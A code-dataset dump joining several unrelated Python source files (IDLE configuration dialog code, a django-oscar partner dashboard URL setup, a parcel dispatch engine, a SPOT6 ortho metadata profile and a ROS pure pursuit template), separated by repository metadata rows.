self.details_frame.config(text='')
self.config_frame[self.current_extension].grid_forget()
self.current_extension = None
if newsel:
self.details_frame.config(text=newsel)
self.config_frame[newsel].grid(column=0, row=0, sticky='nsew')
self.current_extension = newsel
def create_extension_frame(self, ext_name):
"""Create a frame holding the widgets to configure one extension"""
f = VerticalScrolledFrame(self.details_frame, height=250, width=250)
self.config_frame[ext_name] = f
entry_area = f.interior
# create an entry for each configuration option
for row, opt in enumerate(self.extensions[ext_name]):
# create a row with a label and entry/checkbutton
label = Label(entry_area, text=opt['name'])
label.grid(row=row, column=0, sticky=NW)
var = opt['var']
if opt['type'] == 'bool':
Checkbutton(entry_area, textvariable=var, variable=var,
onvalue='True', offvalue='False',
indicatoron=FALSE, selectcolor='', width=8
).grid(row=row, column=1, sticky=W, padx=7)
elif opt['type'] == 'int':
Entry(entry_area, textvariable=var, validate='key',
validatecommand=(self.is_int, '%P')
).grid(row=row, column=1, sticky=NSEW, padx=7)
else:
Entry(entry_area, textvariable=var
).grid(row=row, column=1, sticky=NSEW, padx=7)
return
def set_extension_value(self, section, opt):
name = opt['name']
default = opt['default']
value = opt['var'].get().strip() or default
opt['var'].set(value)
# if self.defaultCfg.has_section(section):
# Currently, always true; if not, indent to return
if (value == default):
return self.ext_userCfg.RemoveOption(section, name)
# set the option
return self.ext_userCfg.SetOption(section, name, value)
def save_all_changed_extensions(self):
"""Save configuration changes to the user config file."""
has_changes = False
for ext_name in self.extensions:
options = self.extensions[ext_name]
for opt in options:
if self.set_extension_value(ext_name, opt):
has_changes = True
if has_changes:
self.ext_userCfg.Save()
help_common = '''\
When you click either the Apply or Ok buttons, settings in this
dialog that are different from IDLE's default are saved in
a .idlerc directory in your home directory. Except as noted,
these changes apply to all versions of IDLE installed on this
machine. Some do not take effect until IDLE is restarted.
[Cancel] only cancels changes made since the last save.
'''
help_pages = {
'Highlighting': '''
Highlighting:
The IDLE Dark color theme is new in October 2015. It can only
be used with older IDLE releases if it is saved as a custom
theme, with a different name.
''',
'Keys': '''
Keys:
The IDLE Modern Unix key set is new in June 2016. It can only
be used with older IDLE releases if it is saved as a custom
key set, with a different name.
''',
'Extensions': '''
Extensions:
Autocomplete: Popupwait is milliseconds to wait after key char, without
cursor movement, before popping up completion box. Key char is '.' after
identifier or a '/' (or '\\' on Windows) within a string.
FormatParagraph: Max-width is max chars in lines after re-formatting.
Use with paragraphs in both strings and comment blocks.
ParenMatch: Style indicates what is highlighted when closer is entered:
'opener' - opener '({[' corresponding to closer; 'parens' - both chars;
'expression' (default) - also everything in between. Flash-delay is how
long to highlight if cursor is not moved (0 means forever).
'''
}
def is_int(s):
"Return 's is blank or represents an int'"
if not s:
return True
try:
int(s)
return True
except ValueError:
return False
class VerticalScrolledFrame(Frame):
"""A pure Tkinter vertically scrollable frame.
* Use the 'interior' attribute to place widgets inside the scrollable frame
* Construct and pack/place/grid normally
* This frame only allows vertical scrolling
"""
def __init__(self, parent, *args, **kw):
Frame.__init__(self, parent, *args, **kw)
# create a canvas object and a vertical scrollbar for scrolling it
vscrollbar = Scrollbar(self, orient=VERTICAL)
vscrollbar.pack(fill=Y, side=RIGHT, expand=FALSE)
canvas = Canvas(self, bd=0, highlightthickness=0,
yscrollcommand=vscrollbar.set, width=240)
canvas.pack(side=LEFT, fill=BOTH, expand=TRUE)
vscrollbar.config(command=canvas.yview)
# reset the view
canvas.xview_moveto(0)
canvas.yview_moveto(0)
# create a frame inside the canvas which will be scrolled with it
self.interior = interior = Frame(canvas)
interior_id = canvas.create_window(0, 0, window=interior, anchor=NW)
# track changes to the canvas and frame width and sync them,
# also updating the scrollbar
def _configure_interior(event):
# update the scrollbars to match the size of the inner frame
size = (interior.winfo_reqwidth(), interior.winfo_reqheight())
canvas.config(scrollregion="0 0 %s %s" % size)
interior.bind('<Configure>', _configure_interior)
def _configure_canvas(event):
if interior.winfo_reqwidth() != canvas.winfo_width():
# update the inner frame's width to fill the canvas
canvas.itemconfigure(interior_id, width=canvas.winfo_width())
canvas.bind('<Configure>', _configure_canvas)
return
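# Usage sketch (assuming a running Tk root window):
#   vsf = VerticalScrolledFrame(root)
#   vsf.pack(fill=BOTH, expand=TRUE)
#   for i in range(50):
#       Label(vsf.interior, text='row %d' % i).pack(anchor=NW)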
if __name__ == '__main__':
import unittest
unittest.main('idlelib.idle_test.test_configdialog',
verbosity=2, exit=False)
from idlelib.idle_test.htest import run
run(ConfigDialog)
| 46.112903 | 86 | 0.625189 |
4a25849c673bc1461f13ec1608020a6200603d0a | 1,975 | py | Python | oscar/apps/dashboard/partners/app.py | radicalgraphics/django-oscar | 0e15a14a5408007f148f080577486e51702ddcc9 | [
"BSD-3-Clause"
] | null | null | null | oscar/apps/dashboard/partners/app.py | radicalgraphics/django-oscar | 0e15a14a5408007f148f080577486e51702ddcc9 | [
"BSD-3-Clause"
] | null | null | null | oscar/apps/dashboard/partners/app.py | radicalgraphics/django-oscar | 0e15a14a5408007f148f080577486e51702ddcc9 | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls import patterns, url
from oscar.core.application import Application
from oscar.apps.dashboard.partners import views
class PartnersDashboardApplication(Application):
name = None
default_permissions = ['is_staff', ]
list_view = views.PartnerListView
create_view = views.PartnerCreateView
manage_view = views.PartnerManageView
delete_view = views.PartnerDeleteView
user_link_view = views.PartnerUserLinkView
user_unlink_view = views.PartnerUserUnlinkView
user_create_view = views.PartnerUserCreateView
user_select_view = views.PartnerUserSelectView
user_update_view = views.PartnerUserUpdateView
def get_urls(self):
urlpatterns = patterns('',
url(r'^$', self.list_view.as_view(), name='partner-list'),
url(r'^create/$', self.create_view.as_view(),
name='partner-create'),
url(r'^(?P<pk>\d+)/$', self.manage_view.as_view(),
name='partner-manage'),
url(r'^(?P<pk>\d+)/delete/$', self.delete_view.as_view(),
name='partner-delete'),
url(r'^(?P<partner_pk>\d+)/users/add/$',
self.user_create_view.as_view(),
name='partner-user-create'),
url(r'^(?P<partner_pk>\d+)/users/select/$',
self.user_select_view.as_view(),
name='partner-user-select'),
url(r'^(?P<partner_pk>\d+)/users/(?P<user_pk>\d+)/link/$',
self.user_link_view.as_view(), name='partner-user-link'),
url(r'^(?P<partner_pk>\d+)/users/(?P<user_pk>\d+)/unlink/$',
self.user_unlink_view.as_view(), name='partner-user-unlink'),
url(r'^(?P<partner_pk>\d+)/users/(?P<user_pk>\d+)/update/$',
self.user_update_view.as_view(),
name='partner-user-update'),
)
return self.post_process_urls(urlpatterns)
application = PartnersDashboardApplication()
| 39.5 | 77 | 0.618734 |
4a2586a52f206a50fcdce6475dd847f89f7b5080 | 2,472 | py | Python | dispatch-engine/app/apis/dispatch/engine.py | rednafi/dispatch-engine | fd32d373f9e14e99151f5fcd9b3185f72fed4133 | [
"MIT"
] | null | null | null | dispatch-engine/app/apis/dispatch/engine.py | rednafi/dispatch-engine | fd32d373f9e14e99151f5fcd9b3185f72fed4133 | [
"MIT"
] | null | null | null | dispatch-engine/app/apis/dispatch/engine.py | rednafi/dispatch-engine | fd32d373f9e14e99151f5fcd9b3185f72fed4133 | [
"MIT"
] | null | null | null | """
This is the heart of the source code that makes everything else tick.
Class Description:
------------------
Class Algo implements the parcel dispatch algorithm
Class DispatchEngine applies the algorithm on real data
"""
import csv
from contextlib import suppress
from typing import Any, Dict, Generator, List
class Algo:
"""Parcel dispatch algorithm."""
@staticmethod
def ordered_chunk(seq: list, n: int) -> Generator[List, None, None]:
"""Yield n number of ordered chunks from seq."""
if n == 0:
print("Binsize cannot be zero.")
elif isinstance(n, float):
print("Binsize cannot be a float.")
with suppress(ZeroDivisionError, TypeError):
k, m = divmod(len(seq), n)
return (
seq[i * k + min(i, m) : (i + 1) * k + min(i + 1, m)] for i in range(n)
)
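# For example, list(Algo.ordered_chunk([1, 2, 3, 4, 5], 2)) yields
# [[1, 2, 3], [4, 5]]: divmod(5, 2) == (2, 1), so the first m chunks
# absorb the remainder while the original order is preserved.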
class DispatchEngine:
"""Applies the parcel dispatch algorithm implemented in the class
Algo on real data."""
def __init__(
self, algo: Algo, parcels: List[Dict[str, int]], agents: List[Dict[str, int]],
) -> None:
self.algo = algo
self.parcels = parcels
self.agents = agents
def dispatch(self) -> Generator[List, None, None]:
return self.algo.ordered_chunk(self.parcels, len(self.agents))
@classmethod
def dispatch_hook(cls, algo, parcels, agents) -> Dict[int, Any]:
"""Making this a classmethod is necessary for this task to be
consumed by rq worker."""
instance = cls(algo, parcels, agents)
dispatched = instance.dispatch()
agent_ids = [d["agent_id"] for d in instance.agents]
agent_parcels = {k: v for k, v in zip(agent_ids, list(dispatched))}
return agent_parcels
@classmethod
def send_csv(cls, agent_parcels: Dict[int, Any], filename=None):
"""Converting the output of dispatch_hook into csv."""
fields = ["agent_id", "area_id", "hub_id", "parcel_id"]
with open(filename, "w", newline="") as f:
writer = csv.DictWriter(f, fieldnames=fields)
writer.writeheader()
for agent_id, parcels in agent_parcels.items():
for row in parcels:
row["agent_id"] = agent_id
writer.writerow(row)
# binding the classmethods to make them work like functions
dispatch_hook = DispatchEngine.dispatch_hook
send_csv = DispatchEngine.send_csv
| 30.518519 | 86 | 0.6161 |
4a2586a740a2731d0bf1f994a70c78ba602b283c | 18,671 | py | Python | metadata/profiles/spot6_ortho.py | DREAM-ODA-OS/tools | 66090fc9c39b35b4ef439d4dfe26ac1349d9c5f2 | [
"MIT"
] | null | null | null | metadata/profiles/spot6_ortho.py | DREAM-ODA-OS/tools | 66090fc9c39b35b4ef439d4dfe26ac1349d9c5f2 | [
"MIT"
] | null | null | null | metadata/profiles/spot6_ortho.py | DREAM-ODA-OS/tools | 66090fc9c39b35b4ef439d4dfe26ac1349d9c5f2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#------------------------------------------------------------------------------
#
# sensor metadata-extraction profiles - spot6 ortho-product
#
# Project: XML Metadata Handling
# Authors: Martin Paces <[email protected]>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2013 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
from .common import (
GDAL_TYPES, OGC_TYPE_DEFS,
check, extract, extattr, isodt
)
import os.path
from .interfaces import ProfileDimap
from lxml import etree
import ns_opt20
#import numpy as np
import geom as ig
from osgeo import ogr; ogr.UseExceptions()
# segmentation threshold
SGLEN = 10000.0 # 10km
def get_mask_element(xml, mtype="Area_Of_Interest (ROI)"):
for elm in xml.iterfind("//Quality_Assessment/Imaging_Quality_Measurement"):
if mtype == extract(elm, "./MEASURE_NAME"):
return elm
return None
def get_multipolygon(fname, sr=None):
#NOTE: GDAL is not able to detect the spatial reference!
geom = ogr.Geometry(ogr.wkbMultiPolygon)
ds = ogr.Open(fname)
if ds is not None and ds.GetLayerCount() > 0:
ly = ds.GetLayer(0)
for ft in (ly.GetFeature(i) for i in xrange(ly.GetFeatureCount())):
_geom = ft.GetGeometryRef()
if "POLYGON" == _geom.GetGeometryName():
if sr is None and _geom.GetSpatialReference() is not None:
sr = _geom.GetSpatialReference()
geom.AddGeometry(_geom.Clone())
geom.Segmentize(SGLEN)
return ig.setSR(geom, sr)
def get_mask(xml, type_="ROI", fname=None):
dname = "." if fname is None else os.path.dirname(fname)
prod_crs = extract(xml, "//Coordinate_Reference_System/Projected_CRS/PROJECTED_CRS_CODE")
title = {
"ROI": "Area_Of_Interest (ROI)",
"CLOUD": "Cloud_Cotation (CLD)",
"SNOW": "Snow_Cotation (SNW)",
"WATER": "Water_Cotation (DTM)",
"VISIBLE": "Visibility_Cotation (VIS)",
}[type_]
msk_elm = check(get_mask_element(xml, title), title)
msk_fname = extattr(msk_elm, "./Quality_Mask/Component/COMPONENT_PATH", "href")
msk_fname = os.path.join(dname, msk_fname)
return get_multipolygon(msk_fname, ig.parseSR(prod_crs))
def get_footprint_and_center(xml, fname=None):
footprint = get_mask(xml, "ROI", fname)
centroid = ig.setSR(footprint.Centroid(), footprint.GetSpatialReference())
return ig.mapToWGS84(footprint), ig.mapToWGS84(centroid)
def get_mask_and_relcover(xml, type_, fname=None):
try:
mask = get_mask(xml, type_, fname)
except ValueError:
return None, None
extn = get_mask(xml, "ROI", fname)
ratio = mask.Area() / extn.Area()
return ig.mapToWGS84(mask), ratio
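# Usage sketch (hypothetical file name): given the parsed DIMAP tree xml,
#   cloud_mask, cloud_ratio = get_mask_and_relcover(xml, "CLOUD", "DIM.XML")
# returns the cloud mask mapped to WGS84 and its area relative to the ROI,
# or (None, None) when the product carries no such mask.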
class ProfileSpot6Ortho(ProfileDimap):
version = "2.0"
profile = "S6_ORTHO"
c_types = {("INTEGER", 16, "UNSIGNED"): "uint16",}
@classmethod
def get_identifier(cls, xml):
""" get dataset's unique identifier """
#pname = extract(xml, "//Dataset_Identification/DATASET_NAME")
mname = extract(xml, "//Source_Identification/Strip_Source/MISSION")
mindex = extract(xml, "//Source_Identification/Strip_Source/MISSION_INDEX")
scode = extract(xml, "//Product_Settings/SPECTRAL_PROCESSING")
idate = extract(xml, "//Source_Identification/Strip_Source/IMAGING_DATE")
itime = extract(xml, "//Source_Identification/Strip_Source/IMAGING_TIME")
dtstr = "".join([idate[0:4], idate[5:7], idate[8:10],
itime[0:2], itime[3:5], itime[6:8], itime[9:10]])
jobid = extract(xml, "//Delivery_Identification/JOB_ID")
return "%s%s_%s_%s_ORT_%s"%(mname, mindex, scode, dtstr, jobid)
@classmethod
def get_parent_id(cls, xml):
""" get collections's unique identifier """
mname = extract(xml, "//Source_Identification/Strip_Source/MISSION")
mindex = extract(xml, "//Source_Identification/Strip_Source/MISSION_INDEX")
iname = extract(xml, "//Source_Identification/Strip_Source/INSTRUMENT")
iindex = extract(xml, "//Source_Identification/Strip_Source/INSTRUMENT_INDEX")
scode = extract(xml, "//Product_Settings/SPECTRAL_PROCESSING")
geom = "ORTHO"
#geom = extract(xml, "//Product_Settings/Geometric_Settings/GEOMETRIC_PROCESSING")
return "%s%s:%s%s:%s:%s"%(mname, mindex, iname, iindex, scode, geom)
@classmethod
def extract_range_type(cls, xml):
subprof = extract(xml, "//Metadata_Identification/METADATA_SUBPROFILE")
if subprof != "PRODUCT":
raise ValueError("Unknown METADATA_SUBPROFILE '%s'"%subprof)
base_name = cls.get_identifier(xml)
nbands = int(extract(xml, "//Raster_Dimensions/NBANDS"))
nbits = int(extract(xml, "//Raster_Encoding/NBITS"))
dtype = extract(xml, "//Raster_Encoding/DATA_TYPE")
dtsgn = extract(xml, "//Raster_Encoding/SIGN")
dtype = check(cls.c_types.get((dtype, nbits, dtsgn)), 'data type')
gdal_dtype = check(GDAL_TYPES.get(dtype), 'data_type')
ogc_dtype = check(OGC_TYPE_DEFS.get(dtype), 'data_type')
nilval = []
for elm in xml.iterfind("//Raster_Display/Special_Value"):
svalidx = extract(elm, "SPECIAL_VALUE_COUNT")
svaltext = extract(elm, "SPECIAL_VALUE_TEXT")
if svaltext == 'NODATA':
nilval.append((0, {
"reason": "http://www.opengis.net/def/nil/OGC/0/inapplicable",
"value": svalidx,
}))
elif svaltext == 'SATURATED':
nilval.append((1, {
"reason": "http://www.opengis.net/def/nil/OGC/0/AboveDetectionRange",
"value": svalidx,
}))
# make sure the no-data goes first
nilval = [obj for _, obj in sorted(nilval)]
band_data = {}
band_ids = []
idx = 0
for elm in xml.find("//Instrument_Calibration/Band_Measurement_List"):
bid = extract(elm, 'BAND_ID')
band = band_data.get(bid)
if band is None:
idx += 1
band = {"bid": bid, "idx": idx}
band_ids.append(bid)
prop = {
'cal_data': extract(elm, "CALIBRATION_DATE"),
'desc': extract(elm, "MEASURE_DESC"),
'unit': extract(elm, "MEASURE_UNIT"),
'uncert': extract(elm, "MEASURE_UNCERTAINTY"),
}
if elm.tag == 'Band_Spectral_Range':
prop.update({
'min': extract(elm, "MIN"),
'max': extract(elm, "MAX"),
})
band['spectral_range'] = prop
elif elm.tag == 'Band_Radiance':
prop.update({
'gain': extract(elm, "GAIN"),
'bias': extract(elm, "BIAS"),
})
band['radiance'] = prop
elif elm.tag == 'Band_Solar_Irradiance':
prop.update({
'value': extract(elm, "VALUE"),
})
band['solar_irradiance'] = prop
band_data[bid] = band
bands = []
for band in (band_data[id_] for id_ in band_ids):
bands.append((band['idx'], {
"identifier": band['bid'],
"name": band['bid'],
"description": "\n".join([
"INFO: Radiance digital numbers.",
"BAND: %s"%band['bid'],
#"BAND_SPECTRAL_RANGE: from %s to %s +/-%s %s"%(
"BAND_SPECTRAL_RANGE: from %s to %s %s"%(
band['spectral_range']['min'],
band['spectral_range']['max'],
#band['spectral_range']['uncert'],
band['spectral_range']['unit'],
),
#"SOLAR_IRRADIANCE: %s +/-%s %s"%(
"SOLAR_IRRADIANCE: %s %s"%(
band['solar_irradiance']['value'],
#band['solar_irradiance']['uncert'],
band['solar_irradiance']['unit'],
),
"UNIT: %s"%band['radiance']['unit'],
"GAIN: %s"%band['radiance']['gain'],
"BIAS: %s"%band['radiance']['bias'],
#"UNCERTAINITY: %s"%band['radiance']['uncert'],
]),
"definition": ogc_dtype,
"data_type": gdal_dtype,
"gdal_interpretation": "Undefined",
"uom": "none",
"nil_values": nilval,
}))
return {
"name": "%s:%d:%s"%(base_name, nbands, dtype),
"bands": [obj for _, obj in sorted(bands)],
}
@classmethod
def extract_range_type_sloppy(cls, xml):
subprof = extract(xml, "//Metadata_Identification/METADATA_SUBPROFILE")
if subprof != "PRODUCT":
raise ValueError("Unknown METADATA_SUBPROFILE '%s'"%subprof)
base_name = cls.get_parent_id(xml)
nbands = int(extract(xml, "//Raster_Dimensions/NBANDS"))
nbits = int(extract(xml, "//Raster_Encoding/NBITS"))
dtype = extract(xml, "//Raster_Encoding/DATA_TYPE")
dtsgn = extract(xml, "//Raster_Encoding/SIGN")
dtype = check(cls.c_types.get((dtype, nbits, dtsgn)), 'data type')
gdal_dtype = check(GDAL_TYPES.get(dtype), 'data_type')
ogc_dtype = check(OGC_TYPE_DEFS.get(dtype), 'data_type')
nilval = []
for elm in xml.iterfind("//Raster_Display/Special_Value"):
svalidx = extract(elm, "SPECIAL_VALUE_COUNT")
svaltext = extract(elm, "SPECIAL_VALUE_TEXT")
if svaltext == 'NODATA':
nilval.append((0, {
"reason": "http://www.opengis.net/def/nil/OGC/0/inapplicable",
"value": svalidx,
}))
elif svaltext == 'SATURATED':
nilval.append((1, {
"reason": "http://www.opengis.net/def/nil/OGC/0/AboveDetectionRange",
"value": svalidx,
}))
# make sure the no-data goes first
nilval = [obj for _, obj in sorted(nilval)]
band_data = {}
band_ids = []
idx = 0
for elm in xml.find("//Instrument_Calibration/Band_Measurement_List"):
bid = extract(elm, 'BAND_ID')
band = band_data.get(bid)
if band is None:
idx += 1
band = {"bid": bid, "idx": idx}
band_ids.append(bid)
prop = {
'cal_data': extract(elm, "CALIBRATION_DATE"),
'desc': extract(elm, "MEASURE_DESC"),
'unit': extract(elm, "MEASURE_UNIT"),
'uncert': extract(elm, "MEASURE_UNCERTAINTY"),
}
if elm.tag == 'Band_Spectral_Range':
prop.update({
'min': extract(elm, "MIN"),
'max': extract(elm, "MAX"),
})
band['spectral_range'] = prop
elif elm.tag == 'Band_Radiance':
prop.update({
'gain': extract(elm, "GAIN"),
'bias': extract(elm, "BIAS"),
})
band['radiance'] = prop
elif elm.tag == 'Band_Solar_Irradiance':
prop.update({
'value': extract(elm, "VALUE"),
})
band['solar_irradiance'] = prop
band_data[bid] = band
bands = []
for band in (band_data[id_] for id_ in band_ids):
bands.append((band['idx'], {
"identifier": band['bid'],
"name": band['bid'],
"description": "\n".join([
"INFO: Radiance digital numbers.",
"BAND: %s"%band['bid'],
"BAND_SPECTRAL_RANGE: from %s to %s %s"%(
band['spectral_range']['min'],
band['spectral_range']['max'],
band['spectral_range']['unit'],
),
]),
"definition": ogc_dtype,
"data_type": gdal_dtype,
"gdal_interpretation": "Undefined",
"uom": "none",
"nil_values": nilval,
}))
return {
"name": "%s:%d:%s"%(base_name, nbands, dtype),
"bands": [obj for _, obj in sorted(bands)],
}
@classmethod
def extract_eop_metadata(cls, xml, ns_opt=None, file_name=None, **kwarg):
""" Extract range definition applicable to all product
of the same type.
"""
ns_opt = ns_opt or ns_opt20
ns_eop = ns_opt.ns_eop
ns_gml = ns_opt.ns_gml
ns_om = ns_opt.ns_om
OPT = ns_opt.E
EOP = ns_eop.E
OM = ns_om.E
#GML = ns_gml.E
time_acq_start = isodt("%sT%s"%(
extract(xml, "//Source_Identification/Strip_Source/IMAGING_DATE"),
extract(xml, "//Source_Identification/Strip_Source/IMAGING_TIME")
))
time_acq_stop = time_acq_start
time_prod = isodt(extract(xml, "//Delivery_Identification/PRODUCTION_DATE"))
# extracting angles and times
for elm in xml.iterfind("//Geometric_Data/Use_Area/Located_Geometric_Values"):
time = isodt(extract(elm, "./TIME"))
if time < time_acq_start:
time_acq_start = time
elif time > time_acq_stop:
time_acq_stop = time
if "Center" != extract(elm, "./LOCATION_TYPE"):
continue
#cnt_row = int(extract(elm, "./ROW"))
#cnt_col = int(extract(elm, "./COL"))
angle_incidence = extract(elm, "./Acquisition_Angles/INCIDENCE_ANGLE")
angle_inc_acrst = extract(elm, "./Acquisition_Angles/INCIDENCE_ANGLE_ACROSS_TRACK")
angle_inc_alngt = extract(elm, "./Acquisition_Angles/INCIDENCE_ANGLE_ALONG_TRACK")
angle_sol_azim = extract(elm, "./Solar_Incidences/SUN_AZIMUTH")
angle_sol_elev = extract(elm, "./Solar_Incidences/SUN_ELEVATION")
break
eo_equipment = EOP.EarthObservationEquipment(
ns_gml.getRandomId(),
EOP.platform(EOP.Platform(
EOP.shortName(extract(xml, "//Source_Identification/Strip_Source/MISSION")),
EOP.serialIdentifier(extract(xml, "//Source_Identification/Strip_Source/MISSION_INDEX")),
EOP.orbitType("LEO"),
)),
EOP.instrument(EOP.Instrument(
EOP.shortName("%s%s"%(
extract(xml, "//Source_Identification/Strip_Source/INSTRUMENT"),
extract(xml, "//Source_Identification/Strip_Source/INSTRUMENT_INDEX"),
)),
)),
EOP.sensor(EOP.Sensor(
EOP.sensorType("OPTICAL"),
)),
EOP.acquisitionParameters(EOP.Acquisition(
EOP.orbitDirection("DESCENDING"),
EOP.illuminationAzimuthAngle(angle_sol_azim, {"uom": "deg"}),
EOP.illuminationElevationAngle(angle_sol_elev, {"uom": "deg"}),
EOP.incidenceAngle(angle_incidence, {"uom": "deg"}),
EOP.acrossTrackIncidenceAngle(angle_inc_acrst, {"uom": "deg"}),
EOP.alongTrackIncidenceAngle(angle_inc_alngt, {"uom": "deg"}),
)),
)
metadata = EOP.EarthObservationMetaData(
EOP.identifier(cls.get_identifier(xml)),
EOP.parentIdentifier(cls.get_parent_id(xml)),
EOP.acquisitionType("NOMINAL"),
EOP.productType("IMAGE"),
EOP.status("ACQUIRED"),
)
result = OPT.EarthObservationResult(
ns_gml.getRandomId(),
)
mask_cloud, ratio_cloud = get_mask_and_relcover(xml, "CLOUD", file_name)
mask_snow, ratio_snow = get_mask_and_relcover(xml, "SNOW", file_name)
if mask_cloud is not None:
result.append(ns_eop.getMask("CLOUD", "VECTOR", geom=mask_cloud))
if mask_snow is not None:
result.append(ns_eop.getMask("SNOW", "VECTOR", geom=mask_snow))
if ratio_cloud is not None:
result.append(OPT.cloudCoverPercentage("%.4f"%(ratio_cloud*100), {"uom":"%"}))
if ratio_snow is not None:
result.append(OPT.snowCoverPercentage("%.4f"%(ratio_snow*100), {"uom":"%"}))
xml_eop = OPT.EarthObservation(
ns_gml.getRandomId(),
ns_eop.getSchemaLocation("OPT"),
#EOP.parameter(), #optional
OM.phenomenonTime(ns_gml.getTimePeriod(time_acq_start, time_acq_stop)),
#OM.resultQuality(), #optional
OM.resultTime(ns_gml.getTimeInstant(time_prod)),
#OM.validTime(), # optional
OM.procedure(eo_equipment),
OM.observedProperty({"nillReason": "unknown"}),
OM.featureOfInterest(
ns_eop.getFootprint(*get_footprint_and_center(xml, file_name))
),
OM.result(result),
EOP.metaDataProperty(metadata),
)
xml_eop = etree.ElementTree(xml_eop)
#xml_eop.getroot().addprevious(ns_eop.getSchematronPI())
return xml_eop
| 42.146727 | 105 | 0.557817 |
4a2587189f08a9a33226d3f5deb5fa42c4bd910b | 12,461 | py | Python | ros/catkin_ws/src/puzzlebot_nav2d/src/pure_pursuit_bt_template.py | robotica-cem/mobile-robots-module | 892b464178d417182e3765d44aa5a84c22730298 | [
"BSD-2-Clause"
] | null | null | null | ros/catkin_ws/src/puzzlebot_nav2d/src/pure_pursuit_bt_template.py | robotica-cem/mobile-robots-module | 892b464178d417182e3765d44aa5a84c22730298 | [
"BSD-2-Clause"
] | null | null | null | ros/catkin_ws/src/puzzlebot_nav2d/src/pure_pursuit_bt_template.py | robotica-cem/mobile-robots-module | 892b464178d417182e3765d44aa5a84c22730298 | [
"BSD-2-Clause"
] | 2 | 2022-03-09T16:57:15.000Z | 2022-03-11T18:39:31.000Z | #!/usr/bin/env python
import sys
import rospy
import numpy as np
from functools import partial
import tf2_ros
import geometry_msgs.msg
from tf2_geometry_msgs import PointStamped
import py_trees
def go_to_point_controller(x, y, vmax, Kth, alpha):
"""
Calculates the desired linear and angular velocities to move the robot to a point.
Used for the final step in the pure pursuit to approach and stay at the goal position.
Arguments
---------
x : float
The x-coordinate of the goal in the reference frame of the robot, in m
y : float
The x-coordinate of the goal in the reference frame of the robot, in m
vmax : float
The maximum linear velocity, in m/s
Kth : float
Gain for the direction controller
alpha : float
Parameter for calculating the linear velocity as it approaches the goal
Returns
---------
w : float
The angular velocity in rad/s
v : float
The linear velocity in m/s
d : float
The distance to the goal
"""
#---------------------------------------------------------
# One possible implementation (a sketch, not the only valid choice):
# proportional control of the heading towards the goal, and a linear
# velocity that tends to vmax far from the goal and to zero at the goal.
d = np.sqrt(x**2 + y**2)
w = Kth * np.arctan2(y, x)
v = vmax * (1.0 - np.exp(-alpha * d**2))
#---------------------------------------------------------
return w, v, d
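# Worked example for the sketch above (hypothetical gains): a goal at
# x=1.0, y=0.5 with vmax=0.6, Kth=4.0, alpha=4.0 gives
#   d = sqrt(1.25) ~ 1.118 m
#   w = 4.0 * atan2(0.5, 1.0) ~ 1.85 rad/s (turning left)
#   v = 0.6 * (1 - exp(-4.0 * 1.25)) ~ 0.60 m/s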
def steer_towards_point_controller(x, y, v):
"""
Given an intermediate goal point and a (constant) linear velocity, calculates the
angular velocity that will steer the robot towards the goal such that the robot
moves in a circular arc that passes through the intermediate goal point.
Arguments
---------
x : float
The x-coordinate of the goal in the reference frame of the robot, in m
y : float
The y-coordinate of the goal in the reference frame of the robot, in m
v : float
The linear velocity in m/s
Returns
---------
w : float
The angular velocity in rad/s
"""
#---------------------------------------------------------
# Pure pursuit steering law: the circular arc through the origin and
# (x, y) has curvature kappa = 2*y / (x**2 + y**2), so w = v * kappa.
w = 2.0 * v * y / (x**2 + y**2)
#---------------------------------------------------------
return w
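# Worked example: a goal point at x=1.0, y=1.0 with v=0.5 m/s gives
# w = 2*0.5*1.0 / (1.0 + 1.0) = 0.5 rad/s, i.e. a circular arc of
# radius v/w = 1 m through the origin and the goal point.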
def get_goal_point(p0, p1, L):
"""
Returns the intermediate goal point for the pure pursuit algorithm. If no point
on the line going through p0 and p1 is at distance L from the origin, then the
returned beta should be a nan.
Arguments
---------
p0 : array-like (2,)
The current waypoint.
p1 : array-like (2,)
The next waypoint.
L : float\n",
The look-ahead distance
Returns\n",
-------\n",
pg : ndarray (2,)
The intermediate goal point
beta : float
The value giving the position of the goal point on the line connecting p0 and p1.
"""
p0 = np.asarray(p0)
p1 = np.asarray(p1)
w = p1-p0
a = np.dot(w, w)
b = 2*np.dot(p0, w)
c = np.dot(p0, p0) - L**2
d = b**2 - 4*a*c
if d < 0:
pg = p0
beta = np.nan
else:
#---------------------------------------------------------
# Take the larger root of the quadratic, i.e. the intersection
# furthest along the direction of travel (from p0 towards p1).
beta = (-b + np.sqrt(d)) / (2.0 * a)
pg = p0 + beta * w
#---------------------------------------------------------
return pg, beta
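# Worked example: with the robot at the origin, p0=(-1, 0), p1=(1, 0)
# and L=0.5: a=4, b=-4, c=0.75, d=4, so beta = (4 + 2)/8 = 0.75 and
# pg = (0.5, 0), which indeed lies at distance L from the robot.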
class Go2Point(py_trees.behaviour.Behaviour):
"""
Takes a point to go to as input and drives towards that point until
within the given distance.
"""
def __init__(self, name="Go2Point"):
"""
Default construction.
"""
super(Go2Point, self).__init__(name)
self.logger.debug("%s.__init__()" % (self.__class__.__name__))
def setup(self, goal, distance, cmd_vel_pub, tf_buffer, robot_frame='base_link',
vel_max=0.6, K_theta=4.0, alpha=4.0):
"""
Arguments
---------
goal : PointStamped
The goal point.
distance : float
When inside this distance, Success is returned.
cmd_vel_pub : Publisher
Publisher that publishes to the /cmd_vel topic
tf_buffer : tf2_ros.Buffer
Transform buffer for transforming the waypoints.
robot_frame : String
